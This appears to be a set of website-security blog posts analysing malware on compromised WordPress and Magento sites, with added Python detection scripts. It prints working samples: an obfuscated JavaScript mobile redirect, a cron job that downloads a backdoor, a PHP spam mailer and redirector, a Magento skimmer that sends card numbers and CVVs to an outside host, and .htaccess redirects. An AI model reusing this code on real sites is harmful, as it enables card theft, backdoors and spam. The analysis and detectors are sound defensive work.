Mobile conditional redirect hidden in the database

We recently found a website that was redirecting mobile users to a third-party site on chickenkiller[.]com. After further investigation we found that the malware was actually injected into the database; the code was hex-encoded so that nobody could find the domain by searching the database for it.

The malware was stored in the wp_options table, in the option_value field of the row with ID 3284 (this ID may not be the same on every infection).

Here's a snippet of the code you may find on infected sites:

a:1:{s:7:"padding";s:1888:"</script><script>var _0x93d9=["\x77\x70\x6B\x6A","\x63\x6F\x6F\x6B\x69\x65","\x3D"
,"\x3B\x20\x70\x61\x74\x68\x3D\x2F","\x3B","\x73\x70\x6C\x69\x74","\x6C\x65\x6E\x67\x74\x68","\x73\x75\x62\x73\x74\x72\x69\x6E\x67"
,"\x63\x68\x61\x72\x41\x74","\x20","\x69\x6E\x64\x65\x78\x4F\x66"];
if(!readCookie(_0x93d9[0])){createCookie(_0x93d9[0],_0x93d9[1],1);if(/iPhone|iPad|iPod/i[_0x93d9[1]]
(navigator[_0x93d9[2]])){window[_0x93d9[3]]=_0x93d9[4]}else {if(/Android/i[_0x93d9[1]](navigator[_0x93d9[2]])){window[_0x93d9[3]]=_0x93d9[5]}};};

This malware's obfuscation technique is not too complex. When deobfuscated, the most interesting part is the conditional redirect, which tells us that the malware had two different final URLs depending on the flavor of the mobile OS:

    if (!readCookie("wpkj")) {
        createCookie("wpkj", "test", 1);
        if (/iPhone|iPad|iPod/i["test"](navigator["userAgent"])) {
            window["location"] = "http:// load-me.chickenkiller .com/5972"
        } else {
            if (/Android/i["test"](navigator["userAgent"])) {
                window["location"] = "http:// load-me.chickenkiller .com/596F"
            }
        };
    };

What we learn from this sample is that checking only your site's files for anomalies is not enough. Once an attack happens, the attacker can add malicious content to your site's database. It could be a backdoor or a malicious redirect for mobile phones.
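Because the strings are stored as "\xNN" escapes, a plain SQL LIKE search for the domain never matches; the way to find such rows is to decode the escapes first. The following is an added example (not code from the original post) that decodes hex-escaped JavaScript string literals and flags wp_options rows that combine a <script> tag with such literals; the option value it embeds is a constructed sample modelled on the snippet above, and row IDs are made up.

```python
import re

# Constructed sample modelled on the wp_options "padding" value shown above.
SAMPLE_OPTION_VALUE = (
    'a:1:{s:7:"padding";s:1888:"</script><script>var _0x93d9=['
    '"\\x77\\x70\\x6B\\x6A","\\x63\\x6F\\x6F\\x6B\\x69\\x65","\\x3D",'
    '"\\x3B\\x20\\x70\\x61\\x74\\x68\\x3D\\x2F","\\x3B","\\x73\\x70\\x6C\\x69\\x74",'
    '"\\x6C\\x65\\x6E\\x67\\x74\\x68","\\x73\\x75\\x62\\x73\\x74\\x72\\x69\\x6E\\x67",'
    '"\\x63\\x68\\x61\\x72\\x41\\x74","\\x20","\\x69\\x6E\\x64\\x65\\x78\\x4F\\x66"];'
)

# A double-quoted JS literal made entirely of \xNN escapes.
HEX_LITERAL = re.compile(r'"((?:\\x[0-9A-Fa-f]{2})+)"')


def decode_hex_literals(text):
    """Return every fully hex-escaped JS string literal in text, decoded."""
    return [bytes.fromhex(lit.replace('\\x', '')).decode('latin-1')
            for lit in HEX_LITERAL.findall(text)]


def deobfuscate(text):
    """Replace each hex-escaped literal with its plain form so the result can be
    grepped for domains, 'location', 'userAgent' and similar."""
    return HEX_LITERAL.sub(
        lambda m: '"' + decode_hex_literals(m.group(0))[0] + '"', text)


def scan_option_rows(rows):
    """rows: iterable of (option_id, option_value) pairs, e.g. from a SQL dump.
    Returns the ids whose value carries a <script> tag plus hex-escaped literals."""
    hits = []
    for option_id, value in rows:
        if '<script' in value.lower() and HEX_LITERAL.search(value):
            hits.append(option_id)
    return hits
```

Run scan_option_rows over a dump of wp_options (and the same idea works for any CMS table that stores HTML) and review every hit with deobfuscate.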

Malicious Cron Jobs

You may remove malware from files and a database, close all security holes, change all passwords, but your site still gets reinfected regularly. It may be because you forgot to clean your crontab.

Here's an example of a malicious cron job that creates a backdoor file in the /wp-includes/Text/Diff/Engine directory every other day:

DOWNLOAD_URL="hxxp://cpanel .jawebsolutions .com/u/w.gz"
LOCAL_FILE_PATH="/home/username/public_html/wp-includes/Text/Diff/Engine/i18n.php"
1 3 */2 * * rm -f /var/tmp/w.gz ; wget -q -O /var/tmp/w.gz $DOWNLOAD_URL && gunzip -c /var/tmp/w.gz > $LOCAL_FILE_PATH && touch -c -t 201007151834 $LOCAL_FILE_PATH && rm -f /var/tmp/w.gz

So don't forget to check cron jobs in your hosting control panel or use the crontab -l command if you have SSH access.
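Reading crontab -l output by eye is error-prone, especially when the URL and target path are hidden behind crontab variables as in the sample above. This added example (not from the original post) expands those variables into each job's command and flags jobs that match the sample's pattern: a remote download, a .php file written into the web root, a back-dated timestamp and a temp-file cleanup. The crontab text is constructed, with the download host replaced by a placeholder.

```python
import re

# Constructed crontab dump modelled on the sample above (placeholder host).
CRONTAB = """\
DOWNLOAD_URL="hxxp://cpanel.example.invalid/u/w.gz"
LOCAL_FILE_PATH="/home/username/public_html/wp-includes/Text/Diff/Engine/i18n.php"
1 3 */2 * * rm -f /var/tmp/w.gz ; wget -q -O /var/tmp/w.gz $DOWNLOAD_URL && gunzip -c /var/tmp/w.gz > $LOCAL_FILE_PATH && touch -c -t 201007151834 $LOCAL_FILE_PATH && rm -f /var/tmp/w.gz
0 4 * * * /usr/bin/php /home/username/public_html/wp-cron.php >/dev/null 2>&1
"""

WEB_ROOTS = ("public_html", "htdocs", "www", "wp-includes", "wp-content")


def parse_crontab(text):
    """Return (variables, [(schedule, command)]) with $VAR references expanded,
    so indirection through crontab variables cannot hide a URL or path."""
    variables, jobs = {}, []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = re.match(r'^([A-Za-z_][A-Za-z0-9_]*)=(.*)$', line)
        if m:
            variables[m.group(1)] = m.group(2).strip('"\'')
            continue
        fields = line.split(None, 5)
        if len(fields) == 6:
            cmd = fields[5]
            for name, val in variables.items():
                cmd = cmd.replace("${%s}" % name, val).replace("$" + name, val)
            jobs.append((" ".join(fields[:5]), cmd))
    return variables, jobs


def suspicious_reasons(cmd):
    """Heuristics taken from the sample job; each one alone is weak, together they are not."""
    reasons = []
    if re.search(r'\b(wget|curl|fetch)\b', cmd) and re.search(r'h?xxps?://|https?://', cmd):
        reasons.append("downloads from a remote URL")
    if any(root in cmd for root in WEB_ROOTS) and re.search(r'>\s*\S*\.php\b', cmd):
        reasons.append("writes a .php file into the web root")
    if re.search(r'\btouch\b.*\s-t\s*\d{8,12}', cmd):
        reasons.append("back-dates the file timestamp (touch -t)")
    if re.search(r'\brm\s+-f\s+/(var/)?tmp/', cmd):
        reasons.append("cleans up a temporary download")
    return reasons


def audit_crontab(text):
    """Return [(schedule, expanded command, reasons)] for jobs hitting 2+ heuristics."""
    hits = []
    for schedule, cmd in parse_crontab(text)[1]:
        reasons = suspicious_reasons(cmd)
        if len(reasons) >= 2:
            hits.append((schedule, cmd, reasons))
    return hits
```

Feed it the output of crontab -l for every account on the server, plus /etc/crontab and the /etc/cron.* directories, since the reinfection job is not always in the web account's own crontab.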

Yet another spam mailer

Here is a mailer script we recently found that appears to be designed to send spam emails.

These kinds of scripts are pretty common. There are multiple variations, but in most cases they are only designed to send spam. Accessing the file directly without passing a specific variable just displays a blank page, which spammers use to hide the functionality of the script.

// A GET request with ?ch=1 answers "OK": a liveness check for the spammer's tooling
if ($_GET['ch']) {
    echo "OK";
    exit();
}

// Mailer: recipient, subject, body and headers all come straight from the POST request
if ($_POST['to']) {
    $to      = $_POST['to'];
    $subject = stripslashes($_POST['subj']);
    $message = stripslashes($_POST['mes']);
    $headers = stripslashes($_POST['headers']);

    if (mail($to, $subject, $message, $headers)) {
        echo "Message sent successfully";
    } else {
        echo "An error occured";
    }
}

// Redirector: the name of the first GET parameter is a dash-separated list of numbers
// that index into $arr to spell out a hostname; the parameter's value becomes the path
if (!$_POST['to'] && !$_GET['ch'] && count($_GET) > 0) {
    $arr = array(
        1 => 'a',  2 => 'b',  3 => 'c',  4 => 'd',  5 => 'e',  6 => 'f',  7 => 'g',
        8 => 'h',  9 => 'i',  10 => 'j', 11 => 'k', 12 => 'l', 13 => 'm', 14 => 'n',
        15 => 'o', 16 => 'p', 17 => 'q', 18 => 'r', 19 => 's', 20 => 't', 21 => 'u',
        22 => 'v', 23 => 'w', 24 => 'x', 25 => 'y', 26 => 'z', 27 => '.', 28 => '1',
        29 => '2', 30 => '3', 31 => '4', 32 => '5', 33 => '6', 34 => '7', 35 => '8',
        36 => '9', 37 => '0'
    );

    $var = key($_GET);
    $var_arr = explode("-", $var);

    foreach ($var_arr as $value) {
        preg_match_all("~\d+~", $value, $matches);
        $value = implode("", $matches[0]);

        // numbers larger than the table size wrap around into the 1..37 range
        if ($value > sizeof($arr)) {
            for ($i = $value; $i > sizeof($arr); $i = $i - sizeof($arr)) {
                $value = $i;
            }
            $value -= sizeof($arr);
        }

        $string .= $arr[$value];
    }

    $link = $string . $_GET[$var];

    header("Location: http://{$link}");
}

If you see it on your site, you are likely compromised.

Magento script stealing credit card details

We recently found another malicious script used to steal credit cards. It appears to be injected into compromised websites running Magento and sends the information to payment.authorize.ga, a recently registered domain that mimics the Authorize.net payment gateway.

The malware was found in file: ./app/code/core/Mage/Payment/Model/Method/Cc.php

$object = new Mage_Checkout_Block_Onepage_Billing;
$address1 = $object->getQuote()->getBillingAddress();
$data1 = $address1->getFirstname();
$data2 = $address1->getLastname();
$data3 = $address1->getStreet(1);
$data5 = $address1->getCity();
$data6 = $address1->getRegion();
$data7 = $address1->getPostcode();
$data8 = $address1->getCountry();
$data9 = $address1->getTelephone();
// $info is the payment info instance already in scope in the surrounding Cc.php method
$data10 = $info->getCcNumber();
$expyear = substr($info->getCcExpYear(), -2);
$expmonth = $info->getCcExpMonth();
if (strlen($expmonth) == 1) {
    $expmonth = '0'.$expmonth;
};
$data11 = $expmonth;
$data12 = $expyear;
$data13 = $info->getCcCid();
$data15 = "infectedwebsite.com";
$data16 = Mage::getSingleton('checkout/session')->getQuote()->getBillingAddress()->getEmail();
$ctx2 = stream_context_create(array(
    'http' => array(
        'timeout' => 3
    )
));
// card number, CVV, expiry, billing details and e-mail are joined with "|" and sent in the query string
$tesco = "$data10|$data13|$data11$data12|$data1 $data2|$data3|$data5|$data6|$data7|$data8|$data16|$data9|$data15";
$ordser = @file_get_contents("http://payment.authorize.ga/uk.html?speciality=$tesco", -1, $ctx2);

We regularly detect malware that targets Magento payment modules.

In this case, the entire code from the $object all the way to the last line ending with $ctx2); should be removed from the Cc.php file in order to stop the credit card details from being sent to the remote website.

Other files could also contain this malicious code or even different code that will re-add the injection back in the site even after the above is removed, so just contact us if you have any questions and we will be happy to inspect the website.
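Both the spam mailer and the Magento skimmer above have a static signature a defender can scan for: a mail() call whose recipient or headers come straight from the request (plus the "ch" probe that answers "OK"), and card-data getters sitting next to an outbound HTTP request. This added example (not from the original post) implements those checks as a small PHP source scanner; the three PHP snippets it embeds are constructed, reduced from the two scripts shown above, with the skimmer's host replaced by a placeholder.

```python
import re

# Constructed samples reduced from the two scripts shown above.
MAILER = """<?php
if ($_GET['ch']) { echo "OK"; exit(); }
if ($_POST['to']) {
    $to = $_POST['to'];
    $subject = stripslashes($_POST['subj']);
    $message = stripslashes($_POST['mes']);
    $headers = stripslashes($_POST['headers']);
    if (mail($to, $subject, $message, $headers)) { echo "Message sent successfully"; }
}
"""
SKIMMER = """<?php
$data10 = $info->getCcNumber();
$data13 = $info->getCcCid();
$tesco = "$data10|$data13";
$ordser = @file_get_contents("http://payment.example.invalid/uk.html?speciality=$tesco", -1, $ctx2);
"""
CLEAN = """<?php
$name = htmlspecialchars($_POST['name']);
mail('admin@example.invalid', 'Contact form', $name);
"""

# $var = $_POST[...] or $var = somefunc($_POST[...]) marks $var as request-controlled.
REQUEST_VAR = re.compile(r'\$(\w+)\s*=\s*(?:\w+\s*\(\s*)?\$_(?:POST|GET|REQUEST)\s*\[')
MAIL_CALL = re.compile(r'\bmail\s*\(([^()]*)\)')
OUTBOUND = re.compile(r'\b(file_get_contents|curl_init|fsockopen|fopen)\s*\(\s*"?https?://')
CARD_GETTER = re.compile(r'->getCc(Number|Cid|ExpYear|ExpMonth)\s*\(')


def scan_php(src):
    """Return a list of findings (strings) for one PHP source file."""
    findings = []
    tainted = set(REQUEST_VAR.findall(src))
    for args in MAIL_CALL.findall(src):
        parts = [a.strip() for a in args.split(",")]
        # recipient is the 1st argument, extra headers the 4th; either being
        # request-controlled turns the script into an open relay
        risky = [p for i, p in enumerate(parts) if i in (0, 3)
                 and (p.lstrip("$") in tainted or "$_" in p)]
        if risky:
            findings.append("mail() recipient/headers controlled by the request: " + ", ".join(risky))
    if OUTBOUND.search(src) and CARD_GETTER.search(src):
        findings.append("card data read via getCc*() next to an outbound HTTP request")
    if re.search(r'\$_GET\s*\[\s*[\'"]ch[\'"]\s*\]', src) and re.search(r'echo\s*"OK"', src):
        findings.append("probe handler ($_GET['ch'] answers \"OK\")")
    return findings
```

Point it at every .php file under the web root, including Magento's app/code/core tree, which should not contain outbound requests in payment models at all.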

Secondtds.mooo[.]com .htaccess redirects

We are finding many sites infected with malicious redirects inside the .htaccess file, pointing to secondtds.mooo[.]com/go.php?sid=3. That domain is a TDS (traffic controller) which redirects visitors to another website that pushes the browser to download this malware: https://www.virustotal.com/en/file/0b6eab15961f92da95a0a4b0d55fee8a8bd0eb39fec1027aa43575802d7a199e/analysis/1441223870/

The redirect chain is:

secondtds.mooo[.]com
downserver.ignorelist[.]com
pastdownload[.]com
stds1new.computersoftwarelive[.]com
download.pastdownload[.]com
files.september-master-3[.]xyz

Here is the .htaccess content:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} go.mail.* [OR]
RewriteCond %{HTTP_REFERER}  .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER}  .*bing.* [OR]
RewriteCond %{HTTP_REFERER}  .*goto.* [OR]
RewriteCond %{HTTP_REFERER}  .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER}  .*nigma.* [OR]
RewriteCond %{HTTP_REFERER}  .*mamma.* [OR]
..
RewriteCond %{HTTP_REFERER}  .*aport.* [OR]
RewriteCond %{HTTP_REFERER}  .*search.* [OR]
RewriteCond %{HTTP_REFERER}  .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER}  .*dogpile.*
RewriteRule ^(.*)$ http://secondtds[.]mooo.com[/]go.php?sid=2 [R=301,L]

The attack is quite buggy and doesn't check whether a site is already infected, which results in multiple identical redirect rules in the same .htaccess file.
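The distinctive shape of this injection is a RewriteRule that sends visitors to another host only when the Referer matches a search engine, and, because of the bug noted above, the same block repeated several times. This added example (not from the original post) groups each RewriteRule with its preceding RewriteCond lines, flags Referer-conditioned external redirects and counts how often each one is repeated; the .htaccess content is constructed from the sample above with the TDS host replaced by a placeholder.

```python
import re
from collections import Counter

# Constructed .htaccess modelled on the sample above (placeholder TDS host),
# with the injected block present twice and a normal WordPress rule after it.
HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$ http://tds.example.invalid/go.php?sid=2 [R=301,L]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$ http://tds.example.invalid/go.php?sid=2 [R=301,L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule . /index.php [L]
"""


def parse_rules(text):
    """Group each RewriteRule with the RewriteCond lines that precede it."""
    rules, conds = [], []
    for line in text.splitlines():
        parts = line.strip().split()
        if not parts:
            continue
        if parts[0] == 'RewriteCond' and len(parts) >= 3:
            conds.append((parts[1], parts[2]))
        elif parts[0] == 'RewriteRule' and len(parts) >= 3:
            rules.append({'pattern': parts[1], 'target': parts[2],
                          'flags': parts[3] if len(parts) > 3 else '',
                          'conds': conds})
            conds = []
    return rules


def find_referer_redirects(text, own_hosts=()):
    """Return {target: times repeated} for rules that redirect (R= flag) to a host
    not in own_hosts and that depend on the Referer header."""
    flagged = Counter()
    for rule in parse_rules(text):
        m = re.match(r'https?://([^/]+)', rule['target'])
        external = m is not None and m.group(1) not in own_hosts
        by_referer = any(var == '%{HTTP_REFERER}' for var, _ in rule['conds'])
        if external and by_referer and 'R=' in rule['flags']:
            flagged[rule['target']] += 1
    return dict(flagged)
```

Pass your own domain names in own_hosts so legitimate www/non-www canonical redirects are not reported.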

If you find this code, remove it right away!